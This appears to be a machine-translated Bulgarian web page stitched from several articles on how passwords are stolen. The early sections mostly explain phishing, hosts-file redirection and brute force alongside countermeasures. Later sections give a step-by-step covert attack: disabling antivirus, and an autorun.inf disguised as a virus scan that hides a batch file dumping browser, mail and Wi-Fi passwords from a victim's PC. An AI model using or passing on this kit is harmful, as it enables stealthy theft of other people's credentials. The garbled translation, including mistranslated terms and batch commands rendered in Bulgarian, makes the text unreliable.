телевизори. Конзоли. Проектори и аксесоари. Технологии. Цифрова телевизия

Как ни крадат паролите. Образователна програма. Методи за „хакване“ - кражба на вашите акаунти и пароли във VKontakte Как да се борим

През последните дни новините съобщиха, че влизания и пароли от милиони пощенски кутии на Google (Gmail), Yandex mail и mail.ru са били публикувани в интернет. Невъзможно е да се намери повече или по-малко сложна парола, тъй като повечето услуги са конфигурирани по такъв начин, че след няколко грешки те подканват потребителя да въведе captcha или просто да блокира IP адреса, от който се извършва брутално принудяване. В по-голямата част от изтичането на пароли не са виновни хитрите хакове на популярни услуги, а самите потребители, които са позволили техните пароли да бъдат компрометирани. Затова бих искал да засегна въпроса как хакерите крадат вашите пароли и какво може да се направи, за да се предотврати това.

1. Фалшиви страници за вход

Въпросът е следният. Под всякакъв претекст потребителят е привлечен към сайта на хакера. Често този сайт има само една страница, но тя изглежда точно като истинска страница за вход във вашата пощенска кутия. Невнимателен потребител въвежда потребителско име и парола, които отиват направо при нападателя.

Как да се борим:

– всеки път, когато възникне нужда от оторизация, погледнете домейна. Често нападателите могат да създават подобни имена на домейни, например:

www.mail.ru.free-host.net

www.yandex-ru.spb.ru

www.gmail-com.com

www.yandex.ru.mail.redte.ru

www.turian.ru/mail.ru

www.mail-compose.ru/yandex

145.35.77.1/mail.ru

Всеки от тези домейни няма нищо общо с популярните имейл услуги. По правило оторизацията не се иска всеки път, така че прекарайте известно време в проучване на името на домейна, преди да въведете паролата си.

Също така си струва да обърнете внимание как хакерите се опитват да ви привлекат към своите злонамерени страници. Ще дам няколко примера, но възможностите не са изчерпателни:

- получавате писмо по пощата, което ви уведомява, че сте получили нещо (пощенска картичка или нещо друго приятно, или обратното - нещо много неприятно и е необходимо вашето незабавно действие, за да не бъде блокиран акаунтът ви, да не бъдат изгубени пари и т.н. .) и има връзка, която трябва да следвате;

– SMS ви информира, че сте получили писмо и ви моли да последвате връзка, за да прочетете това писмо (така че мозъците на мъжете да се изключат, може да се изясни, че писмото е отлъчено от<любое женское имя>).

– изскачащи прозорци на уебсайтове или програми ви информират, че сте получили писмо.

Запомнете това, просто внимавайте. Обърнете внимание на малките неща. Например, често избираме опцията „Запазване на паролата“ в браузъра и когато истинска имейл услуга ви помоли да влезете отново (това се случва от време на време), тогава и двата прозореца (потребителско име и парола) често вече са попълнени и трябва само да щракнем върху бутона за влизане. Хакерите могат да въведат вашето потребителско име (особено ако са ви изпратили злонамерена връзка по имейл), но хакерите не могат да въведат вашата парола. Така че, ако забележите необичайно поведение, разгледайте домейна по-отблизо. Ако домейнът е правилен, но нещо все още не е наред, тогава може да имате друг проблем, който се обсъжда в следващия параграф.

2. Пренасочване чрез hosts файл

Всеки компютър, работещ с операционна система Windows, има файл hosts, който се намира в директорията C:WindowsSystem32Driversetc.

Там можете да регистрирате пренасочване. В резултат на това домейнът в адресната лента на вашия браузър ще бъде напълно верен, но в действителност ще бъдете отведени до страницата за оторизация за хакери, които естествено ще откраднат паролата ви:

На какво да обърнете внимание:

– отворете файла C:WindowsSystem32Driversetchosts с произволен текстов редактор и погледнете в него – не трябва да има споменавания на популярни сайтове или нещо подозрително;

– друг индикатор е, че въвеждате правилно потребителско име и парола, но не се извършва оторизация;

– на страницата за авторизация се иска да изпратите SMS на кратък номер под произволен претекст (потвърждение по телефона, опит за хакване и потвърждение, че сте вие, акаунтът не е активен и ще бъде изтрит, ако не потвърдите, вие трябва да въведете номерата, получени в отговора на SMS съобщението и т.н. ).

Как да се справим с това:

– обикновено файлът hosts е модифициран от вируси, трябва да инсталирате антивирусна програма, ако няма такава, и да проверите компютъра си. Ако имате антивирусна програма, актуализирайте я и проверете компютъра си.

– премахнете излишните редове от файла hosts

3. Програми за проследяване на натиснати клавиши (килограми)

Друг вариант са килохери. Това са програми, които прихващат всичко, което пишете на клавиатурата, и го изпращат на хакера. Всъщност това са вируси и трябва да се борите с тези програми по същия начин, както с другите вируси. Ако вашият имейл постоянно се „хаква“, проверете компютъра си с антивирусна програма, не изтегляйте подозрителни изпълними файлове (те имат разширение .exe, .msi, .hta, .scr, може да има и други, но най-често все още .exe). Инсталирайте антивирусна програма, която може да се актуализира, актуализирайте я редовно и проверявайте компютъра си (или преминете към Linux).

Как да се справим с това:

– ако откриете вирус, за всеки случай променете имейла си и паролите си за социални мрежи;

– това вече беше споменато, но това е толкова често срещана грешка, че ще подчертая отново, не изтегляйте изпълними файлове от подозрителни източници. Изтеглете ги от официалните сайтове. Не изтегляйте файлове, изпратени ви по имейл от непознати (дори ако са снимки на „аз по бански“ и т.н.). Отнасяйте се с внимание към изпълнимите файлове, дори ако са изпратени от хора, които познавате - може да се случи техният имейл да е бил хакнат преди вашия и хакерът да изпраща своите злонамерени програми от тяхно име;

– в интернет кафенета и във всички ситуации, когато трябва да влезете в компютъра на някой друг, използвайте екранната клавиатура, това не е 100% гаранция, но много килограми няма да могат да се справят с такъв завой.

Колкото и депресиращо да звучи, повечето потребители губят паролите си по толкова тривиални начини и тук не се извършват нито сложни хакерски атаки срещу имейл услуги, нито сложен криптоанализ.

Добър ден на всички. Предновогодишната треска и зимните празници свършиха и е време да напишем нещо в блога. Искам да посветя първата публикация за тази година на образователна програма за методите за кражба на пароли, за разлика от една от предишните публикации: Когато сте „хакнати“, не е нужно да бързате да промените всичките си пароли. Струва си да се изясни веднага, че материалът е насочен към неспециалисти по информационна сигурност и е само за информационни цели. Въпреки че може би специалистите също ще научат нещо ново за себе си.

Колкото и да мразят всички паролите, те си остават най-популярното средство за идентификация и до днес, но за съжаление понякога те биват откраднати от нас. Двуфакторното удостоверяване частично помага за решаването на проблема, но само частично и само за най-критичните услуги.

Според статистиката най-честите причини за загуба на контрол върху акаунти са две неща: използването на прости (речникови) пароли и социално инженерство. В тази статия ще говоря за основните методи за хакване на пароли, естествено, с цел повишаване на осведомеността за този проблем сред широка аудитория (използването на материали за разрушителни цели е наказуемо от закона, авторът не носи отговорност и бла бла бла ).

  1. Отгатване

Да, толкова е просто. Вашата парола може лесно да бъде позната. Спомняте ли си всички онези епизоди в холивудските филми, когато героите проникват в нечий компютър и опитват имената на децата на жертвата, бабите и дядовците, чичовците, лелите, имената на домашните любимци на жертвата и т.н. като парола? Така че това наистина е един от най-ефективните методи за хакване и този архаичен метод все още е ефективен. В крайна сметка сега всеки публикува тонове информация за себе си в социалните мрежи и ако паролата се основава на някакви данни, свързани със самоличността на собственика на хакнатия акаунт, тогава изборът на парола е въпрос на време (това е точно причината, поради която паролите трябва да се променят периодично).

Противодействие на метода: като цяло, надявам се да разберете, че „tanyushka1990“ е лоша парола, дори ако Tanyushka не сте вие, а вашата любима внучка. Използвайте пароли, които не могат да бъдат отгатнати интуитивно. Сменяйте паролите периодично (поне веднъж годишно) поне за критични акаунти.

  1. Социално инженерство

Социалното инженерство е доста широко понятие. Социалният инженер може да взаимодейства с жертвата както лично, така и по телефона, но най-често взаимодейства чрез електронни комуникационни канали – месинджъри, социални мрежи, имейл. И тук няма да разглеждаме методите на социалното инженерство като такива, тук по-скоро бих посъветвал да прочетете класиката на жанра - книгата на В. Саймън и К. Митник „Изкуството на измамата“. Това, което е важно за нас тук е, че методите на социално инженерство по отношение на кражба на пароли са насочени към принуждаване на жертвата да се откаже от паролата си. Един пример изглежда така: нападател се представя като нов системен администратор и казва на служител на вашата организация, че се нуждае от паролата за имейла на служителя, за да проведе някои тестове за сферичен вакуум. Друг пример, когато няма личен контакт между нападателя и жертвата: мейл от фен с фишинг връзка и тревожно съобщение (например, вашият акаунт е докладван, той е блокиран и вие „трябва“ да последвате връзката към деблокирайте го). Фишинг връзката води до страница, предварително подготвена от атакуващия и едно към едно подобна на страницата за оторизация на някоя популярна услуга, например: vk.com, gmail.com, facebook.com и др. Какво се случва след това: жертвата, мислейки, че това е законна услуга, въвежда вашето потребителско име и парола, тези идентификационни данни се изпращат на нападателя, показва се съобщение за грешка (кой от нас никога не е правил грешка при въвеждане на парола? Всичко може да се случи!) и след това потребителят се пренасочва към истинската страница за оторизация, тъй като мръсното дело вече е извършено и няма смисъл жертвата да се държи на фалшива страница. Между другото, ако някой друг не знае защо Windows иска да натиснете клавишната комбинация Alt-Ctrl-Del, преди да влезете, горещо ви съветвам да го потърсите в Google и да го прочетете.

Противодействие на метода: обикновено предприятията използват хибридни методи за противодействие на социалното инженерство (в тези предприятия, естествено, където те обикновено са загрижени за проблемите на информационната сигурност), но трябва да разберете, че тъй като социалният инженер може да взаимодейства с жертвата, без да използва никаква комуникация канали (и съответно няма да можем да филтрираме, блокираме или проследяваме съобщенията му), тогава единственият наистина ефективен метод за противодействие е да информираме служителите (е, или себе си, ако говорим за лична безопасност) за методи на социално инженерство. В края на краищата в наши дни малко хора ще се влюбят в наследството на нигерийски принц или развода „Мамо, изпрати пари на номер XXXX. Ще обясня по-късно“, но тези методи някога са работили.

  1. Воайорство

Тук само накратко ще спомена такива очевидни неща като пароли върху стикери, които са залепени на монитора или върху парчета хартия под клавиатурата. Тук шпионирането може да се разбира и като шпиониране на процеса на въвеждане на парола. Тоест, по-добре е да въведете паролата, когато никой не наблюдава процеса. Има хора с интересни способности. Например, един от моите приятели се обзаложи с мен, че ще ме гледа как въвеждам парола на лаптоп и след това сам ще повтори паролата. И той наистина го повтори. Бях много изненадан, тъй като знам да пиша с десет пръста и мога да въведа паролата си много бързо. Оказа се, че приятелят има някаква специална фотографска памет. Опасен човек =)

Тоест, надникването помага на атакуващия бързо да получи готова парола и да не прибягва до други по-сложни или ресурсоемки техники, които ще бъдат разгледани по-долу. Но надникването на паролата „с очите“ не е единственият начин. Например, ако сте въвели паролата си на компютъра на някой друг и случайно сте запазили паролата, излезли сте от акаунта, но не сте изчистили данните, тогава някой друг може не само да влезе в акаунта, без да знае паролата (това не е толкова лошо ), но също така извадете тази парола изрично, като вмъкнете този прост скрипт в адресната лента на браузъра на страницата, където се въвеждат потребителското име и паролата (замаскирани със звездички):

javascript:(function())(var%20s,F,j,f,i;%20s%20=%20%22%22; %20F%20=%20document.forms;%20for(j=0;% 20j

[свиване]

Ако паролата се използва в други акаунти, нападателят може да получи достъп и до тях. Ето защо експертите по сигурността категорично не препоръчват използването на една и съща парола за различни акаунти.

Контраметод: Не въвеждайте паролата си, когато някой стои до вас и гледа ръцете ви. Не въвеждайте паролата си на ненадеждни устройства. Ако все пак се наложи, погрижете се да изчистите информацията за пароли и бисквитки. В допълнение, кийлогърите могат да бъдат инсталирани на ненадеждни устройства.

  1. Избор на пароли с помощта на речници

Плавно преминахме от интуитивни и измамни техники за кражба на парола към технически. Първият от тях е избор на пароли с помощта на речници. Може би дори неспециалисти в областта на информационната сигурност са чували от новините за големи течове на пароли към пощенските кутии на различни пощенски услуги. Както се оказа по-късно, повечето от тези течове не са свързани с хакване на сървърите на доставчика на услуги, а с баналния избор на пароли за пощенски кутии с помощта на речници. Повечето от паролите на „хакнати“ пощенски кутии бяха комбинации като „123456“, „qwerty“ и други подобни. В секцията „Материали“ публикувах няколко речника с пароли (можете да ги попълните сами), които могат да се използват или в различни инструменти като John the Ripper или Hydra, или да проверите с банално търсене дали паролата ви е в речника. Ако има, тогава спешно го променяме!

Контраметод: Използване на сложни пароли без речник.

  1. Груба сила

Името на метода идва от две английски думи: brute - груб и force - сила. От името интуитивно става ясно как този метод се различава от предишния - тук просто се изпробват всички възможни комбинации от пароли. Методът отнема много време и ресурси, тъй като изборът чрез този метод изисква значителни компютърни ресурси. Следователно нападателите прибягват до този метод само в крайни случаи. Например, знаейки точната дължина на паролата или знаейки, че паролата определено не съдържа специални знаци и числа, може да намали времето за избор. Това намалява броя на възможните комбинации.

Противодействия: използване на дълги, хаотични пароли и периодична смяна на паролите.

  1. Дъгови маси

Всеки, който е трябвало да възстанови парола за която и да е услуга през последните години, трябва да е забелязал, че ако преди това някои услуги просто са ви изпращали паролата ви по имейл, сега трябва незабавно да измислите нова парола. Това се дължи на факта, че никоя уважаваща себе си услуга не съхранява паролите в чист текст. Паролите се съхраняват под формата на хешове. Накратко, хешът е резултат от трансформиране на текст (в нашия случай парола) чрез някаква необратима математическа функция. Резултатът от преобразуването на думата „парола“ (без кавички) с помощта на общия алгоритъм MD5 изглежда така: Приблизително така нашите пароли се съхраняват от доставчиците на услуги и тъй като се смята, че функциите са необратими, изглежда, че самите доставчици не могат да знаят нашата парола и да ни я изпратят в ясен текст. Можете да прочетете повече за хеширането.

Rainbow таблиците, казано много грубо, ви позволяват да възстановите парола с помощта на хеш. Разбира се, целият процес е много по-сложен, отколкото изглежда. Следователно тези, които се интересуват да научат повече за технологията, могат да започнат със страницата на Wikipedia. Изглежда, че с помощта на дъговите таблици би било възможно да се разбие почти всяка парола, но това също има своите трудности за нападателя. Ако грубата сила изисква време и ресурси за самото търсене, то в случай на дъгови таблици същото е необходимо за генериране на същите тези таблици. Освен това, всеки набор от дъгови таблици ще има много ограничения, те включват: ограничение за дължината на паролата, ограничение за набора от символи и ограничение за конкретен алгоритъм за хеширане. В интернет в публичното пространство можете да намерите дъгови таблици за избор на пароли, не по-дълги от 6 знака, които съдържат само букви от английската азбука на двата регистъра, но без специални знаци и цифри. Сега обаче искат пари за нещо по-сериозно.

Противодействие: осоляване на хешове. За съжаление, този тип противодействие е наличен само на ниво администратор на услугата и не зависи по никакъв начин от действията на крайния потребител.

  1. Хибридни методи

Хибридните методи означават комбинация от различните методи, посочени по-горе заедно. Всъщност пример за използване на методите „груба сила“ + „надникване“ вече беше даден по-горе. Например, нападателят може да види не цялата парола, а само знаците, които съставят паролата. Това ще му позволи да посочи само необходимите символи в параметрите по време на груба сила и да изключи всички останали от търсенето, като по този начин значително намали броя на възможните комбинации.

Друг пример за хибриден метод: взема се дума от речника и буквите в нея се заменят със специални знаци. Например вземете паролата от речника „password“ и опитайте комбинациите „password123“, „p@ssword“, „pa$$w0rd“ и т.н.

Противодействието на хибридните методи включва използването на всички изброени по-горе контрамерки.

Как да крадем пароли от windows.

Здравейте всички, днес ще си позволя да засегна още една тема, която, струва ми се, ще заинтересува мнозина. Ще създадем специален инструмент, който ще ни позволи да показваме и запазваме всички пароли, които се записват в Windows. Ваш или на някой друг. Просто казано, крадат пароли .

Да развием темата. Какви браузъри използвате? Колко има в прозорците? Глупав въпрос: ползвате ли социални мрежи? Други социални проекти? Всеки от нас има доста такива ресурси. Всеки от тях изисква парола, която се съхранява в същия браузър. Удобно е. Но не е безопасно и сега ще разберете защо. Има помощни програми, които ще позволят крадат пароли от браузърина всякакви ивици за уебсайтове.

Забравена парола за вашия рутер? Или имаш отделен кабел? Няма разлика - помощната програма, включена в пакета, ще позволи крадат интернет пароли. Закупихте ли Windows честно със собствените си пари? Инсталиран ли е със закупения компютър и лаптоп? Но всеки път, когато отидете онлайн, Windows проверява базата данни за резултатите от работата. Уникалният ключ за активиране на Windows е изискване за удостоверяване. Ще говорим и за това къде се съхранява. Има помощна програма, която ще позволи крадат системни ключове и пароли. Ще има и ключ към пакета. Microsoft Office…

в пълен изглед…

Имате ли имейл клиенти на вашия компютър? Microsoft Outlook, Filezilla, Mozilla Thunderburd? Когато влезете в пощата, пощенският клиент изпраща пароли към пощенските кутии към сървърите на пощенския сървър... Има помощна програма, която позволява крадат пароли за пощенски кутии.

Сега ще ви покажа как можете да извадите най-тайните неща от windows само с няколко кликвания на мишката.

И пароли дори за отдалечени програми и браузъри във всякаква форма.

Как да крадем пароли от Windows?

Ще използваме програми от NirSoft.Разработчиците имат много „полезни“ помощни програми. Сега ще разгледаме тези, които ще ни помогнат в конкретни задачи. Всички представени програми имат преносима версия и не изискват инсталация. На уебсайта на производителя обаче можете да изтеглите файлове за русификация, за да крадат пароли от системата, те не са много важни.

За да „крадем пароли“ от Windows, имаме нужда от:

  • безплатно флаш устройство (може да се използва по предназначение дори след като е „наточено“ за извличане на пароли);
  • колекция от самите програми (можете да я изтеглите директно от моя уебсайт)
  • няколко манипулации с документи на Notepad.
  • Половината от тези програми се идентифицират като „зловреден софтуер“ на етапа на изтегляне от браузъра. Какво можем да кажем за антивирусите... Така че, преди да използвате инструмента, който сте създали, ще трябва да ИЗКЛЮЧИТЕ антивирусната програма.
  • изпълнението на някои помощни програми ще изисква администраторски права

ГАРАНТИРАМ, ЧЕ ИЗТЕГЛЕНИЯТ СЪБОР Е БЕЗ ВИРУСИ. ХАРАКТЕРЪТ НА РАБОТА НА ПРОГРАМИТЕ ОБАЧЕ Е ПОДОБЕН НА ДЕЙСТВИЯТА НА СНАЙФЕРИТЕ. ТАКА АНТИВИРУСЪТ ЩЕ ОТЧЕТВА ЗА „ПРОБЛЕМИ“ ПОВЕЧЕ ОТ ПЪТИ.

Да започваме работа.

  • Нека деактивираме антивирусната програма. Временно.
  • . Опаковах го два пъти, за да спечеля поне малко време и да не ме забранят търсачките, които не харесват подобни програми. Парола за архив

компютър76

  • Нека подготвим нашето флаш устройство. Да, няма какво да готвите, ще ви трябва малко място. Защо флашка? Той е преносим, ​​понякога малък по размер и дори невидим. Вашите манипулации могат да останат незабелязани дори от жертвата, която трябва да отиде в кухнята да пие кафе.
  • Разопаковайте програмите на USB флаш устройството. Не в която и да е папка, а по директен път, за да са достъпни като отвориш флашката. Разопакованите помощни програми ще стартират масово bat файл с името започнете .

Този bat файл е създаден в обикновен Notepad. , прочетете тук. Документът съдържа код за автоматично стартиране на помощни програми и записването им в съответните текстови файлове. Можете да го преименувате и да видите състава му, като използвате същия Notepad.

След стартиране на груповия файл всяка от програмите ще се отвори в отделен прозорец с всички ваши (или чужди) пароли и/или ще се опита да създаде текстов файл, в който ще се показват намерените пароли Опера, Firefox, Internet Explorer, имейл клиенти и себе си Windows. Всичко ще отнеме няколко секунди. Упражнявайте бавно на вашия компютър.

Ще разгледаме как да използваме придобитите умения на чужд компютър правилно, бързо и възможно най-дискретно в една от следващите статии.

Прочетено: 321



истинскизатвор!

Нека се опитаме да разберем как можете да откраднете пароли от компютър, ако имате достъп до него, но без жертвата да подозира нищо.

Един от начините е да създадете специално флаш устройство с помощни програми, които могат да извличат пароли от браузъри и други програми, които запазват пароли за удобство на потребителя.

Нека изтеглим помощните програми за възстановяване на парола, от които се нуждаем:

* MessenPass - възстановява пароли за най-популярните програми за незабавни съобщения: MSN Messenger, Windows Messenger (в Windows XP), Windows Live Messenger (в Windows XP и Vista), Yahoo Messenger (версия 5.x/6.x), ICQ Lite 4 .x/5.x/2003, AOL Instant Messenger, AIM 6.x, AIM Pro, Trillian, Miranda и GAIM;

* Mail PassView - извлича запазени пароли от имейл клиенти: Outlook Express, Microsoft Outlook 2000 (само POP3/SMTP акаунти), Microsoft Outlook 2002/2003/2007, Windows Mail, IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free, и уеб базирани имейл акаунти;

* IE Passview - показва данни за вход и пароли, записани от "магарето";

* ChromePass - показва данни за вход и пароли, запазени от браузъра Google Chrom;

* PasswordFox - получава всички пароли, записани от Firefox;

* Protected Storage PassView - възстановява всички пароли, записани в защитено хранилище;

* Dialupass - извлича всички пароли за комутируема/VPN сесия;

* Възстановяване на мрежова парола - показва паролите, които използвате за вашия дял в локалната мрежа, както и паролите за .NET Passport/Messenger акаунт;

* PstPassword - извлича пароли от файловете на личната папка на Outlook - .PST;

* WirelessKeyView - възстановява всички безжични мрежови ключове (WEP/WPA), които се съхраняват на вашия компютър.

Има и помощна програма, наречена OperaPassView, но тя все още не поддържа командния ред. Затова не го включваме в нашия комплект.
Могат да се вземат всички комунални услуги.

Нуждаем се също от помощната програма Hidden Start().

Ние също ще го изтеглим, за да прикрием нашите помощни програми. Ще го стартираме в края на операцията за извличане на парола. И само работата му ще бъде видяна от жертвата на екрана му.

Подготвяме флашката.

1. Създайте две папки на флаш устройството:
флаш устройство:\prog\
флаш устройство:\prog\log\

2. В папката на флашката:\prog\ качете всички изпълними файлове – utilities, hstart.exe, KK.exe

3. В корена на флаш устройството създайте autorun.inf със следното съдържание:


open=prog/hstart /NOCONSOLE "launch.bat"
ДЕЙСТВИЕ= Сканирайте компютъра си за вируси


Тук действието е бутон, който ще се показва в прозореца за избор на действие, когато е свързано флаш устройство, а отварянето е команда, която трябва да се изпълни, когато това действие е избрано. Тази команда включва стартиране на пакетния файл в скрит режим с помощта на помощната програма Hidden Start.

4. Създайте пакетен файл launch.bat:

ехото е изключено
echo %computername%\%username% bte% %time% >> prog/log/_log.txt
стартирайте prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt
стартирайте prog/Dialupass.exe /stext prog/log/%computername%_dialupass.txt
стартирайте prog/iepv.exe /stext prog/log/%computername%_iepv.txt
стартирайте prog/mailpv.exe /stext prog/log/%computername%_mailpv.txt
стартирайте prog/mspass.exe /stext prog/log/%computername%_mspass.txt
стартирайте prog/netpass.exe /stext prog/log/%computername%_netpass.txt
стартирайте prog/pspv.exe /stext prog/log/%computername%_pspv.txt
стартирайте prog/PstPassword.exe /stext prog/log/%computername%_pstpassword.txt
стартирайте prog/WirelessKeyView.exe /stext prog/log/%computername%_wirelesskeyview.txt

Ако не съществува "%programfiles%\Mozilla Firefox\" GoTo End
стартирайте prog/PasswordFox.exe /stext prog/log/%computername%_passwordfox.txt
:Край
стартирайте prog/KK.exe

Нека да разгледаме по-подробно командите на пакетния файл:

echo off – забрана за показване на резултатите от изпълнението в прозореца на CMD

echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt – запишете името на компютъра, потребителското име, датата и часа във файла prog/log/_log.txt

стартирайте prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt – стартирайте помощната програма ChromePass.exe, която, когато се изпълни, трябва да записва паролите във файла prog/log/computername_chrom.txt

Същото и за други комунални услуги. Единствената забележка е, че преди да стартираме PasswordFox.exe, ще проверим дали FF изобщо е инсталиран на компютъра на жертвата. Просто ако FF не е инсталиран, тогава помощната програма PasswordFox.exe показва съобщение за грешка.

стартиране на prog/KK.exe – прикриваме действията си, като стартираме истинска помощна програма за премахване на червея Net-Worm.Win32.Kido от Kaspersky Lab

Това е всичко - флашката е готова. Сега нападателят просто трябва да свърже флаш устройство към компютъра на жертвата и да избере „Сканиране на компютъра за вируси“ в изскачащия прозорец, който се появява, за да извлече всички запазени пароли на този компютър. Обосновката за стартиране на „сканиране за вируси“ е доста проста, особено ако жертвата ви има доверие.

Как да се бием?

1. Не запазвайте пароли - по-добре е да използвате някаква програма като Password Keeper или eWallet.

3. Да имате добра антивирусна е задължително! Въпреки че той ще се закълне само в няколко от тези помощни програми.

Поводът за написването на тази статия беше статия в списание "Хакер".

Тази статия е написана само с информационна цел.
Целта му е да защити вашите данни от нападател.
Който е наясно е въоръжен!

Кражбата на чужди пароли води до наказателна отговорност по част 1 на чл. 272 от Наказателния кодекс на Руската федерация „Незаконен достъп до компютърна информация“ и заплашва истинскизатвор!



Свързани публикации